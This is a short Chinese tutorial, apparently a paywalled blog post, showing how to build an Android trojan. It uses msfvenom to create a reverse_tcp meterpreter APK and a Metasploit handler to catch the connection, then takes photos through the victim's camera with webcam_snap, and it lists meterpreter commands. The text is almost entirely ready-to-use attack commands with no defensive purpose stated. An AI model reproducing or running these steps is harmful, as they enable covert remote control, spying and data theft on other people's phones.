生成木马
msfvenom -p android/meterpreter/reverse_tcp lhost="192.168.1.8" lport=5000 R > /root/payload.apk

运行msfconsole
msfconsole
use exploit/multi/handler
设置配置并启动
set payload android/meterpreter/reverse_tcp
set LhOST 192.168.1.8
set lport 5000
run

拍照
webcam_snap
附命令
===========
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http

本文介绍如何使用Metasploit生成Android平台的木马程序,并通过命令行进行远程控制操作,包括拍照、文件管理和系统命令执行等。
最低0.47元/天 解锁文章
1393

被折叠的 条评论
为什么被折叠?



